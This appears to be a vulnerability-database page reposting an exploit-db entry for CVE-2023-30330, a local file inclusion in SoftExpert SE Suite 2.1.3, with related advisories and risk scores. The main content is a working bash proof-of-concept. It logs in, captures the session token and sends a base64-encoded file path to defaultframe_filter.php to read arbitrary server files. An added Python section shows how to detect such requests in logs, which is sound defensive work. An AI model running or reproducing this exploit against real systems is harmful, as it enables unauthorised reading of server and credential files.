SoftExpert (SE) Suite v2.1.3 - Local File Inclusion

02 May 2023 00:00:00 | Reported by Felipe Alcantara | Type: exploitdb | Source: www.exploit-db.com

SoftExpert (SE) Suite Local File Inclusio

Related

Reporter | Title | Published | Family
0day.today | SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Vulnerability | 2 May 2023 00:00 | zdt
GithubExploit | Exploit for Untrusted Search Path in Softexpert Excellence_Suite | 1 Apr 2023 14:12 | githubexploit
Circl | CVE-2023-30330 | 24 Jan 2025 20:04 | circl
CNNVD | SoftExpert Suite security vulnerability | 2 May 2023 00:00 | cnnvd
CVE | CVE-2023-30330 | 12 May 2023 00:00 | cve
Cvelist | CVE-2023-30330 | 12 May 2023 00:00 | cvelist
EUVD | EUVD-2023-34753 | 3 Oct 2025 20:07 | euvd
NVD | CVE-2023-30330 | 12 May 2023 01:15 | nvd
OSV | CVE-2023-30330 | 12 May 2023 01:15 | osv
Packet Storm | SoftExpert Suite 2.1.3 Local File Inclusion | 3 May 2023 00:00 | packetstorm

# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Date: 27-04-2023
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.softexpert.com/
# Version: 2.0 < 2.1.3
# Tested on: Kali Linux
# CVE : CVE-2023-30330
# SE Suite versions tested: 2.0.15.31, 2.0.15.115

# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330


#!/bin/bash

# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> 

target=$1
u=$2
p=$3
file=$(echo -n "$4"|base64 -w 0)

end="\033[0m\e[0m"
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"

echo -e "\n$4 : $file\n"

echo -e "${blue}\nGETTING SESSION COOKIE${end}"
cookie=$(curl -i -s -k -X $'POST' \
    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \
    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \
    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \
    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)

echo "cookie: $cookie"

function LFI () {

curl -s -k -X $'POST' \
    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \
    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \
    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \
    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"

}

echo -e "${blue}\nExploiting LFI:${end}"
LFI

function logout () {
curl -i -s -k -X $'POST' \
    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \
    "https://$target/softexpert/selogout"
}

echo -e "${blue}\nLogging out${end}"
logout >/dev/null
echo -e "\n\nDone!"
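
Detection note (an added example, not part of the original exploit-db entry or the author's code): the PoC sends the target file path base64-encoded in the managerPath parameter of a POST to defaultframe_filter.php, so a plain string match on the request body will not see it. The sketch below decodes that parameter from proxy or WAF logs and flags absolute or traversal paths. The JSON log schema, the sample lines and the rule that legitimate values are relative paths are assumptions.

```python
import base64
import binascii
import json
import re
from urllib.parse import parse_qs, quote, urlsplit

# Endpoint and parameter come from the PoC above; the version segment ("v42300"
# there) is matched loosely on the assumption that it differs between installs.
ENDPOINT = re.compile(r"^/se/[^/]+/generic/gn_defaultframe/2\.0/defaultframe_filter\.php$")
# Assumption: legitimate managerPath values are relative paths inside the app tree.
SUSPICIOUS = re.compile(r"^(/|\\|[a-z]:)|\.\.|\x00|^[a-z][a-z0-9+.-]*://", re.I)

def decode_manager_path(body):
    """Return the base64-decoded managerPath from a form body, or None."""
    values = parse_qs(body, keep_blank_values=True).get("managerPath")
    if not values:
        return None
    raw = values[0].replace(" ", "+")  # an unescaped '+' is parsed as a space
    try:
        return base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def find_suspicious(log_lines):
    """Return (source, decoded_path) for each request that looks like file inclusion."""
    hits = []
    for line in log_lines:
        event = json.loads(line)
        path = urlsplit(event.get("path", "")).path
        if event.get("method") != "POST" or not ENDPOINT.match(path):
            continue
        decoded = decode_manager_path(event.get("body", ""))
        if decoded is not None and SUSPICIOUS.search(decoded):
            hits.append((event.get("src"), decoded))
    return hits

def _event(src, path, manager_path):
    """Build one constructed JSON log line (hypothetical proxy log schema)."""
    b64 = quote(base64.b64encode(manager_path.encode()).decode())
    body = f"action=4&managerName=x&managerPath={b64}&instantiate=false"
    return json.dumps({"src": src, "method": "POST", "path": path, "body": body})

FILTER = "/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"
SAMPLE_LOG = [  # constructed sample data, not real traffic
    _event("198.51.100.10", FILTER, "document/filter"),
    _event("203.0.113.7", FILTER, "/etc/hostname"),
    _event("203.0.113.7", FILTER, "../../conf/app.properties"),
    _event("203.0.113.7", "/softexpert/selogin", "/etc/hostname"),
]
```

find_suspicious(SAMPLE_LOG) returns the two flagged requests from 203.0.113.7. Most web servers do not record POST bodies by default, so this only works where body logging is enabled at the proxy or WAF.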


02 May 2023 00:00 (current)
Risk: 9.8 (High risk)
Vulners AI Score: 9.8
CVSS 3.1: 9.8
EPSS: 0.02583